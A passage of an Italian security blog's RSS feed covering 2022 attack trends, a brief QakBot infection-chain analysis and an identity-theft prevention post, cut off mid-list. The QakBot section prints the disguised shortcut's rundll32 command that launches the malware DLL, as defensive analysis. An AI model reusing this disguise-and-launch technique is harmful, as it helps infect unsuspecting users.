&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/almanacco-2022/almanacco-16.png&#34; alt=&#34;Orari registrazione eventi critici&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;target-e-tecnologie&#34;&gt;Target e tecnologie&lt;/h2&gt;

&lt;p&gt;I gruppi criminali sono ormai diventati delle vere e proprie organizzazioni, il cui obiettivo è quello pecuniario. Nel grafico sottostante possiamo vedere &lt;strong&gt;i maggiori settori industriali che sono stati oggetto delle attività criminali durante il 2022&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/almanacco-2022/almanacco-10.png&#34; alt=&#34;Settori colpiti 2022&#34; /&gt;
Fonte: Rapporto Clusit 2022&lt;/p&gt;

&lt;p&gt;È interessante notare come i primi tre settori riconoscibili riguardino il settore healthcare, quello governativo e quello dell’informazione e della tecnologia, cioè proprio quei &lt;strong&gt;settori che gestiscono e veicolano enormi quantitativi di dati sensibili&lt;/strong&gt;.
Questo trend è in linea con la situazione precedentemente descritta e anche con il trend dell’anno 2021, in cui i maggiori tre settori erano: governativo, ICT e healthcare.&lt;/p&gt;

&lt;p&gt;Per quanto riguarda invece &lt;strong&gt;i tipi di attacco troviamo al primo posto l’utilizzo di malware, in tutte le sue tipologie, seguito da attacchi basati su vettori o tecnologie ancora sconosciuti, campagne phishing e vulnerabilità&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/almanacco-2022/almanacco-12.png&#34; alt=&#34;Tipi attacco 2022&#34; /&gt;
Fonte: Rapporto Clusit 2022&lt;/p&gt;

&lt;p&gt;Se nel primo semestre dell’anno il conflitto ha avuto un ruolo cardine per gli attacchi informatici registrati, &lt;strong&gt;nel secondo semestre la scena è stata rubata da&lt;/strong&gt; &lt;a href=&#34;https://blog.cybergon.com/posts/nuove-vulnerabilita-microsoft-exchange/&#34;&gt;Microsoft Exchange ProxyNotShel&lt;/a&gt;, una vulnerabilità che ha reso attaccabili quasi 250 mila server in tutto il mondo, di cui quasi 10.000 solo sul territorio nazionale.&lt;/p&gt;

&lt;h2 id=&#34;trend-del-2023&#34;&gt;Trend del 2023&lt;/h2&gt;

&lt;p&gt;Quali sono i principali &lt;strong&gt;trend che impatteranno il panorama e il mercato della cybersecurity&lt;/strong&gt;?&lt;/p&gt;

&lt;h3 id=&#34;innovazione-tecnologica&#34;&gt;Innovazione tecnologica&lt;/h3&gt;

&lt;p&gt;La cybersecurity è influenzata dall’&lt;strong&gt;innovazione tecnologica&lt;/strong&gt;. Per questa ragione, essere in grado di anticipare i trend crea l’opportunità di sviluppare un vantaggio competitivo a supporto e protezione della continuità del business.&lt;/p&gt;

&lt;p&gt;In particolare, per il nuovo anno possiamo considerare tre macrocategorie:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sviluppo nuove tecnologie&lt;/strong&gt; come l’Artificial Intelligence, la Blockchain o il 5G. L’innovazione può essere uno strumento utile contro gli attacchi informatici poiché l’uso di nuove tecnologie sia di difesa che di attacco permettono all’organizzazione una maggiore protezione. In particolare, per quanto riguarda l’Artificial Intelligence e la Blockchain, l’abilità di prevenire rischi e minacce tramite le tecnologie sopracitate con il riconoscimento di comportamenti malevoli o dannosi sarà sempre più un fattore differenziante molto forte.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Introduzione di nuove architetture e processi&lt;/strong&gt; come Security by Design, Zero-Trust o DevSecOps. L’introduzione di elementi fisici e logici è fondamentale per il controllo dell’effettiva integrità del perimetro aziendale, la cui verifica puntuale avviene tramite l’adozione di principi, metodologie e paradigmi architetturali. Uno dei trend maggiormente in crescita è quello relativo al modello Zero-Trust, un paradigma che presuppone l’assenza di perimetro di rete all’interno del quale gli utenti e le risorse sono considerati automaticamente affidabili. Ripensare alla logica di permessi ed accessi ad ogni nodo della rete aziendale, unito ad un controllo efficace e preciso delle utenze, diventa quindi d’obbligo per un’azienda e per tutti i fornitori che hanno a che fare con essa.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Espansione delle superfici di attacco&lt;/strong&gt; come il cloud, il metaverso o addirittura il tanto amato smart working. Ad esempio, la crescente adozione di sistemi cloud, accelerata dalla situazione di emergenza sanitaria, rende sempre più necessaria l’introduzione di nuove competenze dedicate e di opportuni sistemi di controllo, monitoraggio e orchestrazione, così come le modalità di lavoro ibride, che prevedono l’utilizzo di dispositivi personali e reti domestiche, costituiscono ormai la nuova normalità. Le aziende devono adottare tecnologie e soluzioni per la sicurezza degli endpoint e la mitigazione del rischio derivante dal fattore umano, specialmente in considerazione dei comportamenti richiesti a ciascuna mansione aziendale.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&#34;importanza-crescente-dell-ad-audit&#34;&gt;Importanza crescente dell’AD Audit&lt;/h3&gt;

&lt;p&gt;Strettamente collegato alla logica Zero-Trust è la &lt;strong&gt;gestione delle utenze presenti nell’Active Directory&lt;/strong&gt; di un’azienda.
&lt;strong&gt;Monitorare i propri utenti abilita a rilevare i tentativi di accesso non riconosciuti in tempo reale&lt;/strong&gt;. L’AD Audit è un tool utilizzato per riconoscere eventuali anomalie nella gestione delle utenze, così come i processi ad esse connessi, come la dimissione delle utenze di un dimissionario, che spesso sono fortemente sottostimati rispetto al rischio connesso. Tramite l’AD Audit, si effettua inoltre &lt;strong&gt;il controllo delle password delle diverse utenze in uso, in modo da rilevare password deboli, riutilizzate o compromesse e agire tempestivamente in caso di necessità&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Proprio per &lt;strong&gt;l’importanza strategica del controllo e l’attuale poca attenzione che viene riservata&lt;/strong&gt;, per il 2023 si prevede un &lt;strong&gt;investimento sensibile nel servizio, unitamente ad una crescente attenzione nella creazione di policy interne&lt;/strong&gt; volte alla gestione corretta.&lt;/p&gt;

&lt;p&gt;Per capire l’impatto positivo dell’analisi, riportiamo i &lt;strong&gt;risultati derivati dalla nostra analisi diretta&lt;/strong&gt; di un campione di oltre 90.000 utenze prese in esame:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;il 28% degli utenti risulta avere una &lt;strong&gt;password duplicata&lt;/strong&gt;, questo significa che a più username sono collegate le stesse password&lt;/li&gt;
&lt;li&gt;il 10% degli utenti risulta avere una &lt;strong&gt;password compromessa&lt;/strong&gt;, ovvero presente in qualche data breach&lt;/li&gt;
&lt;li&gt;il 4% degli utenti risulta un &lt;strong&gt;admin e quindi detiene pieni poteri&lt;/strong&gt; sull’Active Directory aziendale&lt;/li&gt;
&lt;li&gt;il 65% degli utenti risulta &lt;strong&gt;non cambiare la password da oltre 90 giorni&lt;/strong&gt; (il 52% da oltre 365).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Lo spaccato mette in allarme su come nel 2023 per le aziende diventerà di primaria importanza investire e creare grande consapevolezza sull’utilizzo e la gestione corretta delle password, una base fondamentale per la sicurezza informatica che viene ancora trattata con troppa leggerezza.&lt;/p&gt;

&lt;p&gt;Probabilmente nel 2023 si assisterà anche all’&lt;strong&gt;inserimento pervasivo di uno o più fattori di autenticazione, i cosiddetti MFA&lt;/strong&gt;, di cui fa parte l’autenticazione a due fattori, già in uso per i servizi bancari e amministrativi come lo SPID. Proprio l’innovazione sui processi di autenticazione sarà parte della strategia per mitigare i rischi derivati da una gestione approssimativa dell’Active Directory, come i problemi di furto delle password aziendali.&lt;/p&gt;

&lt;h3 id=&#34;fattore-umano&#34;&gt;Fattore umano&lt;/h3&gt;

&lt;p&gt;Old but gold, &lt;strong&gt;non possiamo non menzionare l’importanza che continuerà ad avere il fattore umano&lt;/strong&gt;, sia come fonte di rischio, sia come valido alleato per una pronta prevenzione e/o risoluzione dei rischi.&lt;/p&gt;

&lt;p&gt;Come abbiamo visto dal grafico precedente, &lt;strong&gt;il 14% degli attacchi arriva da campagne phishing&lt;/strong&gt;. Questo dato ci mette in allarme su come i cyber criminali continuino a sfruttare la disattenzione e/o l’inesperienza dell’utente per mettere a segno attacchi informatici. Non è mai abbastanza importante, quindi, sottolineare che il fattore umano gioca ancora un ruolo fondamentale, soprattutto considerando che investire in una formazione continuativa per il proprio personale ha un costo decisamente più basso rispetto al ripristino di un incidente informatico, senza considerare il costo di un eventuale riscatto.&lt;/p&gt;

&lt;p&gt;Agire sul &lt;a href=&#34;https://blog.cybergon.com/posts/cyber-security-awareness-quando-il-fattore-umano-puo-ridurre-il-rischio-di-un-attacco-informatico/&#34;&gt;fattore umano&lt;/a&gt; e &lt;strong&gt;creare una cultura sulla difesa informatica tramite la condivisione di alcune best practice&lt;/strong&gt;, da un lato, e il &lt;strong&gt;buon esempio dato dalle figure apicali&lt;/strong&gt; in azienda, dall’altro, continua ad essere un punto di attenzione spesso sottovalutato.&lt;/p&gt;

&lt;h3 id=&#34;complessità-di-valutazione-di-un-attacco-informatico&#34;&gt;Complessità di valutazione di un attacco informatico&lt;/h3&gt;

&lt;p&gt;Investire in sicurezza informatica è un aspetto fondamentale per poter &lt;strong&gt;permettere la business continuity di un’azienda&lt;/strong&gt;. Tuttavia, molte realtà pensano ancora di essere un target improbabile per le aziende di cybercrimine, oppure ritengono di avere gli strumenti finanziari e legali per sopportare le conseguenze di un attacco.&lt;/p&gt;

&lt;p&gt;Per capire davvero quali sono gli effetti degli attacchi informatici in termini di cyber rischi, si riporta &lt;strong&gt;un elenco non esaustivo dei maggiori esiti osservati&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Interruzione o ritardi nei processi di business&lt;/li&gt;
&lt;li&gt;Costi di ripristino e risarcimento danni&lt;/li&gt;
&lt;li&gt;Violazione o alterazione dei dati aziendali&lt;/li&gt;
&lt;li&gt;Danni legati alle terze parti&lt;/li&gt;
&lt;li&gt;Danni di immagine&lt;/li&gt;
&lt;li&gt;Estorsione digitale&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Considerando l’impatto, la stima del rischio è utile per quantificare la perdita finanziaria, l’interruzione o il danno reputazionale che un’attività subisce a causa di un attacco.&lt;/p&gt;

&lt;p&gt;Esistono &lt;strong&gt;diversi fattori che entrano in gioco per stimare il rischio&lt;/strong&gt;. Questi &lt;strong&gt;fattori sono molto soggettivi&lt;/strong&gt; in base al tipo di azienda, al tipo di attacco ricevuto e all’impatto mediatico, per questo motivo non ci è possibile condividere dei dati oggettivi in termini economici che un attacco può avere sull’attività.&lt;/p&gt;

&lt;p&gt;Esiste però &lt;strong&gt;una formula che mostra le sei diverse variabili che entrano in gioco&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/almanacco-2022/almanacco-13.png&#34; alt=&#34;Formula Cyber Rischio&#34; /&gt;
Fonte: Osservatori Digitali&lt;/p&gt;

&lt;p&gt;Si ritiene che nel 2023, al modello sopracitato verranno aggiunte nuove variabili che renderanno ancora più complessa la stima del rischio, ampliando anche il quantitativo di scelte strategiche che fanno la differenza all’interno di un’azienda.&lt;/p&gt;

&lt;h2 id=&#34;le-nostre-considerazioni&#34;&gt;Le nostre considerazioni&lt;/h2&gt;

&lt;p&gt;Il numero di attacchi ad aziende italiane (e non) è di nuovo aumentato vertiginosamente nell’ultimo anno e proprio per questo, a livello mediatico, &lt;strong&gt;un attacco informatico non fa più tanto rumore rispetto a qualche anno fa&lt;/strong&gt;. &lt;strong&gt;Questo, però, non significa che il numero di aziende colpite sia diminuito&lt;/strong&gt;, ma anzi, le attività registrate, come abbiamo visto, continuano ad aumentare anno dopo anno.&lt;/p&gt;

&lt;p&gt;Inoltre, stiamo misurando un &lt;strong&gt;cambiamento sui target aziendali presi di mira&lt;/strong&gt; dalle organizzazioni criminali. Se fino a qualche tempo fa l’obiettivo primario era principalmente la grande impresa, &lt;strong&gt;si riscontra un aumento significativo di attacchi anche alle piccole e medie imprese italiane, che non sono preparate ad affrontare una simile situazione, soprattutto da un punto di vista economico&lt;/strong&gt;. Questo è un sintomo che il mercato del cybercrime sta differenziando sempre più il suo target, con obiettivi diversi in base alla dimensione aziendale.&lt;/p&gt;

&lt;p&gt;Un trend che è stato registrato, soprattutto dalle autorità italiane, riguarda &lt;strong&gt;le attività illecite che si sono spostate dal mondo fisico a quello digitale&lt;/strong&gt;. Secondo il report Clusit 2022, nella sezione in collaborazione con la Polizia Postale, è infatti emerso il continuo aumento di crimini digitali, sempre più capillari e puntuali. Questo trend, che è iniziato anche in seguito allo scoppio della guerra cibernetica, continuerà anche nel nuovo anno.&lt;/p&gt;

&lt;p&gt;Inoltre, ci troveremo ad affrontare gruppi criminali che uniranno le forze per mettere a punto attacchi sempre più sofisticati e mirati. Agendo come vere e proprie organizzazioni, il cui obiettivo è quello di trarre un guadagno, nell’ultimo anno è spesso capitato di notare delle &lt;strong&gt;collaborazioni tra diverse organizzazioni criminali che, focalizzandosi su specifici ambiti della criminalità informatica, sono riuscite a creare vantaggi competitivi&lt;/strong&gt;. Grazie alla segmentazione delle competenze richieste per perpetrare attività illecite di cyber crimine, infatti, ciascuna organizzazione offre la propria verticalità sul mercato col fine di &lt;strong&gt;creare partnership e collaborazioni&lt;/strong&gt;, proprio come avviene normalmente tra aziende. Questo aspetto crea un ulteriore strato di difficoltà, per un settore che già di per sé è estremamente verticale e che sta a sua volta segmentando questa verticalità.&lt;/p&gt;

&lt;p&gt;Un altro aspetto che vogliamo sottolineare riguarda &lt;strong&gt;il binomio sicurezza informatica e innovazione tecnologia&lt;/strong&gt;, due termini che procedono di pari passo. Le aziende che si approcciano all’innovazione, devono avere ben chiaro quali implicazioni essa crea a livello di sicurezza informatica; così anche quelle che si approcciano alla sicurezza informatica devono capire quali innovazioni adottare per poterne trarre un vantaggio concreto. È inutile e controproducente pensare di adottare nuove tecnologie e processi seguendo gli ultimi trend del mercato, senza tener conto dei propri processi aziendali interni o della propria cultura aziendale.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;La sicurezza informatica deve diventare un processo continuativo, strutturato e guidato da competenze verticali&lt;/strong&gt; nel settore, anche per quanto riguarda l’acquisizione di nuove tecnologie e di innovazioni. In poche parole, è inutile dotarsi dei più avanzati livelli di monitoraggio comportamentale, se non viene prima costruita una base di controllo della rete con filtri antispam, antivirus e firewall.&lt;/p&gt;

&lt;p&gt;Il quadro diventa ancora più complesso considerando che la nuova cybersecurity che vedremo nel 2023 sarà quindi:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Sistemica (coinvolgerà tutte le persone, organizzazioni e tecnologie di diversa natura e provenienza geografica)&lt;/li&gt;
&lt;li&gt;Sociale (l’impatto della cybersecurity non si limiterà ai sistemi informativi, ma avrà ripercussioni sociali, economiche e politiche)&lt;/li&gt;
&lt;li&gt;Mutevole (il fenomeno della criminalità informatica, come più volte ripetuto, è costantemente in crescita).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Proprio considerando l’impatto sistemico e sociale della Sicurezza Informatica nel 2023, &lt;strong&gt;le imprese non potranno fare a meno di investire in assicurazioni&lt;/strong&gt; che tengano conto del rischio informatico. Un attacco informatico può costare dai 100.000 ai 3,8 milioni di euro, sia per quanto riguarda il ripristino del funzionamento delle attività sia per il pagamento di eventuali risarcimenti.&lt;/p&gt;

&lt;p&gt;Questi numeri spesso segnano il fallimento per molte aziende e proprio per questo &lt;strong&gt;sono nate polizze specifiche per il cyber risk, pensate per tutelare dai danni causati da attacchi informatici&lt;/strong&gt;. Tuttavia le stesse assicurazioni stanno diventando sempre più complesse, con il rischio di diventare poco utilizzate e quindi inutili.&lt;/p&gt;

&lt;p&gt;Come ultimo tema, per il 2023 si segnalano &lt;strong&gt;due importanti cambiamenti a livello di regolamentazioni internazionali&lt;/strong&gt;: da una parte la pubblicazione in Gazzetta Ufficiale EU del &lt;strong&gt;Regolamento Digital Operational Resilience Act&lt;/strong&gt; (DORA), che entrerà in vigore a Gennaio 2023 (con applicazione a partire dal 17 Gennaio 2025); dall’altra &lt;strong&gt;la Direttiva NIS2&lt;/strong&gt;, a cui gli stati membri dell&amp;rsquo;UE dovranno adeguare le proprie normative nazionali entro Ottobre 2024.&lt;/p&gt;

&lt;p&gt;Queste due operazioni mirano da un lato ad incrementare le misure di sicurezza a favore della resilienza e della sicurezza informatica del settore finanziario, dall’altro lato ad introdurre obblighi più stringenti, semplificando alcune procedure.&lt;/p&gt;

&lt;p&gt;In attesa che entrambe entrino in vigore ci chiediamo, &lt;strong&gt;quali impatti avranno sulle imprese italiane il prossimo anno&lt;/strong&gt;?&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Funzionamento del malware QakBot</title>
         <link>https://blog.cybergon.com/posts/funzionamento-malware-qakbot/</link>
         <pubDate>Thu, 22 Dec 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Simone Errico</author>
         
               
             <author>Ilaria Martinelli</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/funzionamento-malware-qakbot/</guid>
         <description>

&lt;p&gt;Nell’ultimo periodo è stato riscontrato un &lt;strong&gt;aumento sul territorio italiano del malware QakBot&lt;/strong&gt; che viene distribuito principalmente mediante campagne phishing.&lt;/p&gt;

&lt;p&gt;L’aumento potrebbe essere imputato alla &lt;strong&gt;collaborazione sempre più stretta&lt;/strong&gt; che viene rilevata &lt;strong&gt;tra aziende di cyber crimine&lt;/strong&gt; diverse. Queste, infatti, acquisendo sempre più una verticalità specifica nelle dinamiche di compromissione di un sistema informatico, stanno &lt;strong&gt;creando partnership per sfruttare il vantaggio competitivo l’una dell’altra&lt;/strong&gt; e portare avanti attacchi sempre più sofisticati.  Il comportamento rilevato è del tutto analogo alle partnership che vengono create tutti i giorni da aziende in tutto il mondo, ma sono ovviamente volte ad azioni illegali.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Le due aziende coinvolte&lt;/strong&gt; in questo caso sono: &lt;strong&gt;QakBot&lt;/strong&gt;, specializzata nell’ottenere accesso non autorizzato a network terzi, e &lt;strong&gt;Black Basta&lt;/strong&gt;, focalizzata sullo sviluppo e la distribuzione di ransomware.&lt;/p&gt;

&lt;p&gt;Di seguito svolgiamo una prima analisi del suo funzionamento.
&lt;strong&gt;Ulteriori informazioni seguiranno nelle prossime settimane.&lt;/strong&gt;&lt;/p&gt;

&lt;h2 id=&#34;come-funziona&#34;&gt;Come funziona&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Il vettore iniziale dell’attacco è riconducibile ad una campagna phishing&lt;/strong&gt;, forse proveniente da un’azienda che collabora con il bersaglio, in cui le caselle email potrebbero essere state compromesse in precedenza.&lt;/p&gt;

&lt;p&gt;L’email che viene inviata alla vittima è simile alla seguente:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/analisi-malware/malware-1.png&#34; alt=&#34;Email phishing&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Cliccando sul link, viene &lt;strong&gt;scaricato un archivio compresso protetto dalla password&lt;/strong&gt; condivisa all’interno della mail. Questo &lt;strong&gt;metodo&lt;/strong&gt; è &lt;strong&gt;molto comune perché permette di bypassare i controlli antivirus&lt;/strong&gt;. L’archivio scaricato contiene un file IMG (Disk Image File), cioè un file che può essere usato come un disco.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/analisi-malware/malware-2.png&#34; alt=&#34;Foto Malware&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Una volta aperto il file, questo si monta come un normale disco o drive USB e contiene, a sua volta, altri due file.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Uno è un file LNK&lt;/strong&gt;, un collegamento di Windows, &lt;strong&gt;in cui l’icona è stata modificata risultando quella standard di una directory&lt;/strong&gt;. Il file menzionato ha lo stesso nome dell’archivio compresso scaricato inizialmente e con un target realizzato appositamente, come da immagine.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/analisi-malware/malware-3.png&#34; alt=&#34;Foto Malware&#34; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il target&lt;/strong&gt; “%SystemRoot%\system32\rundll32.exe \opengl.dat,DrawThemeIcon” &lt;strong&gt;ha lo scopo di eseguire&lt;/strong&gt;, successivamente al doppio click dell’utente, &lt;strong&gt;il secondo file contenuto nella directory&lt;/strong&gt; chiamato opengl.dat che, nonostante l’estensione molto generica, è una DLL, Dynamic Link Library, una libreria contenente codice e dati utilizzabili da più di un programma contemporaneamente.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/analisi-malware/malware-4.png&#34; alt=&#34;Foto Malware&#34; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Questo file che è una delle più recenti versioni del malware QakBot&lt;/strong&gt; che, una volta eseguito, prima inietta una propria copia in un processo di sistema e, subito dopo, contatta una lunga serie di server C2 alla ricerca di ulteriori istruzioni.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;L’attacco&lt;/strong&gt; molto probabilmente &lt;strong&gt;passa a questo punto nelle mani di un operatore umano che&lt;/strong&gt;, dopo operazioni di ricognizione, privilege escalation ed eventuale esfiltrazione di dati, &lt;strong&gt;lancia il ransomware Black Basta&lt;/strong&gt;, di cui abbiamo menzionato la collaborazione nell’introduzione.
In questo caso, tra l’accesso iniziale e l’esecuzione del ransomware sono passate appena alcune ore.&lt;/p&gt;

&lt;p&gt;Inoltre, ricordiamo che è sempre bene affidarsi ad un SOC che opera in &lt;sup&gt;24&lt;/sup&gt;&amp;frasl;&lt;sub&gt;7&lt;/sub&gt; e che in caso di incident puoi scriverci a &lt;strong&gt;sos@cybergon.com&lt;/strong&gt;.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Il furto d&#39;identità digitale: come difendersi</title>
         <link>https://blog.cybergon.com/posts/furto-identita-come-difendersi/</link>
         <pubDate>Wed, 16 Nov 2022 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Ilaria Martinelli</author>
         
               
             <author>Margherita Fontana</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/furto-identita-come-difendersi/</guid>
         <description>

&lt;p&gt;Da quando internet ha iniziato a far parte della nostra vita, navighiamo online, in un mondo parallelo, con una vera e propria identità digitale.
I nostri dati sono salvati e le nostre informazioni sono accessibili e condivise per poter svolgere determinate azioni.&lt;/p&gt;

&lt;p&gt;Ma sappiamo davvero &lt;strong&gt;cosa può succedere alla nostra identità digitale&lt;/strong&gt; nel momento in cui alcune informazioni ci vengono rubate?&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/furto-identita/furtodidentita-copertina.png&#34; alt=&#34;Furto d&#39;identità digitale&#34; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il furto d’identità è un crimine che ha visto una fortissima impennata: solo nel 2021, sono 11,11 milioni gli italiani vittime di furto di dati e credenziali&lt;/strong&gt;, inoltre l&amp;rsquo;Italia è al dodicesimo posto tra tutti i paesi al mondo in termini di account violati.&lt;/p&gt;

&lt;p&gt;Facciamo però un passo indietro e indaghiamo la tipologia di crimine.&lt;/p&gt;

&lt;h2 id=&#34;il-furto-d-identità&#34;&gt;Il furto d&amp;rsquo;identità&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Il furto d’identità è una pratica per cui un utente finge di essere qualcun altro&lt;/strong&gt; per eseguire operazioni ed azioni spesso illegali e/o che possono creare danni alla vittima e vantaggi al truffatore.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;L’identità può essere sia personale&lt;/strong&gt;, e fa riferimento alla rappresentazione dell’individuo in relazione al contesto sociale, &lt;strong&gt;sia digitale&lt;/strong&gt;, cioè l’insieme delle risorse digitali che vengono associate in maniera univoca ad una persona fisica.&lt;/p&gt;

&lt;p&gt;Per il furto d’identità digitale sono diverse le modalità utilizzate dai cyber criminali. Generalmente si fa leva sulla disattenzione o sull’inesperienza dell’utente.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Social engineering&lt;/strong&gt; è il termine utilizzato per far riferimento a tutte &lt;strong&gt;quelle tecniche che spingono l’utente a compiere un determinato gesto&lt;/strong&gt;, per esempio il click sul link contenuto all’interno di una mail, che è propedeutico al furto di informazioni sensibili.&lt;/p&gt;

&lt;p&gt;In genere le informazioni più richieste dai cyber criminali riguardano:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;I dati anagrafici che permettono di identificare un utente;&lt;/li&gt;
&lt;li&gt;I dati bancari che permettono di ottenere l’accesso a conti e carte di credito;&lt;/li&gt;
&lt;li&gt;Le credenziali di accesso, cioè nome utente e password, che vengono usate per accedere a diversi servizi.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&#34;in-lombardia&#34;&gt;In Lombardia&lt;/h2&gt;

&lt;p&gt;La situazione è in grave discesa poiché, se nel 2021 i numeri relativi a furti d’identità, &lt;strong&gt;solo in Lombardia&lt;/strong&gt;, risultavano 2800, dall’inizio del nuovo anno &lt;strong&gt;ad oggi sono già stati registrati 3300 casi&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Una media di quasi nove casi al giorno, che vede Milano l’area con più attacchi messi a segno&lt;/strong&gt;, seguita da Brescia, Bergamo e Varese.&lt;/p&gt;

&lt;p&gt;Se si parla di numeri, va sottolineato che sono cresciuti sensibilmente i furti sotto i 1500 euro, con circa il 52% rispetto all’anno precedente. I maxi-furti (tra 5 e 10 mila euro), inoltre, sono passati dal 9.6% al 14%.&lt;/p&gt;

&lt;p&gt;Nel 34% dei casi, il furto di dati si conclude con l’attivazione di un prestito finanziario, anche se sono cresciute del 59% anche le frodi sulle carte di credito.&lt;/p&gt;

&lt;p&gt;(I dati sopra riportati fanno riferimento alle ricerche “Osservatorio sulle Frodi Creditizie e furti d’identità” da CRIF-Mister Credit)&lt;/p&gt;

&lt;h2 id=&#34;è-possibile-evitare-il-furto-d-identità&#34;&gt;È possibile evitare il furto d’identità?&lt;/h2&gt;

&lt;p&gt;Vogliamo sottolineare che un attacco informatico che può portare al furto d’identità digitale non è un evento totalmente evitabile. &lt;strong&gt;Esistono però alcune azioni che possono aiutarci a prevenirlo&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Password sicure: non utilizzare le stesse password per più account e creare delle password con almeno 12 caratteri che contengano maiuscole, minuscole, numeri e caratteri speciali.&lt;/li&gt;
&lt;li&gt;Attenzione alla ricezione di mail o SMS che possono essere campagne phishing: se una mail o un SMS ci sembrano sospetti, meglio controllare direttamente dal sito ufficiale dell’azienda impersonata per verificare se si tratta di phishing oppure no.&lt;/li&gt;
&lt;li&gt;Attenzione quando si inseriscono i propri dati sensibili: inserire i propri dati solamente su siti che riteniamo affidabili e accedendo direttamente dal sito ufficiale.&lt;/li&gt;
&lt;li&gt;Utilizzare una VPN: cioè una connessione in cui viene creata una rete privata che garantisce privacy, anonimato e sicurezza dei dati attraverso un canale di comunicazione.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Nel grafico sottostante è possibile vedere quali sono i maggiori tipi di furto d’identità: circa il 32%, cioè la fetta più grande, riguarda la frode delle carte di credito, ma è sicuramente da non sottovalutare anche il 14.4% collegato alle frodi finanziarie.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/furto-identita/furtoidentita-1.PNG&#34; alt=&#34;Furto d&#39;identità per tipo&#34; /&gt;
Fonte: Nordvpn&lt;/p&gt;

&lt;p&gt;Essendo un fenomeno sempre più diffuso, il Dipartimento della giustizia degli Stati Uniti ha pubblicato un documento in cui analizza il fenomeno.&lt;/p&gt;

&lt;p&gt;Guardando oltre oceano, secondo il report, le perdite finanziarie dovute al furto d’identità hanno superato i 15 milioni di dollari; il 7% delle vittime ha denunciato il furto alla polizia, mentre l’88% ha preso contatto con la banca solo una volta venuto a conoscenza del furto.&lt;/p&gt;

&lt;h2 id=&#34;il-furto-d-identità-digitale-e-il-nostro-sistema-legale&#34;&gt;Il furto d&amp;rsquo;identità digitale e il nostro sistema legale&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Il furto di identità digitale è un reato connotato da una grande zona d’ombra dovuta alla difficile identificabilità dell’utente&lt;/strong&gt; che si appropria di dati non suoi.
Questo tipo di reato sta dando vita ad una vera e propria emergenza sociale a causa delle conseguenze non prevedibili che possono essere innescate da un’avvenuta sostituzione di persona.&lt;/p&gt;

&lt;p&gt;Il problema nasce dal fatto che un &lt;strong&gt;controllo sull’identità reale&lt;/strong&gt; di chi compie determinate azioni dietro ad un monitor (iscriversi ad un social network, utilizzare dati per compiere azioni finanziarie etc.) &lt;strong&gt;non esiste&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Dal canto suo, &lt;strong&gt;la giurisprudenza&lt;/strong&gt;, nell’adeguarsi al cambiamento sociale, &lt;strong&gt;ha riscontrato e riscontra considerevoli difficoltà procedurali&lt;/strong&gt; nel mantenersi al passo con la realtà e con l’evoluzione delle tecniche di un mondo così fluido come è quello digitale.&lt;/p&gt;

&lt;p&gt;Basti pensare che ad oggi risulta ancora difficile far rientrare il phishing nel reato di sostituzione di persona per diversi motivi:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Nella maggior parte dei casi &lt;strong&gt;il mittente non si sostituisce a una persona fisica, ma ad una giuridica&lt;/strong&gt; (banca, poste…) e quindi tecnicamente non sussiste la sostituzione all’altrui “persona”&lt;/li&gt;
&lt;li&gt;Talvolta &lt;strong&gt;non c’è un’attribuzione di “falso nome”&lt;/strong&gt;, ma l’utilizzo delle credenziali di accesso (username e password) di qualcun altro, che è una condotta ben diversa&lt;/li&gt;
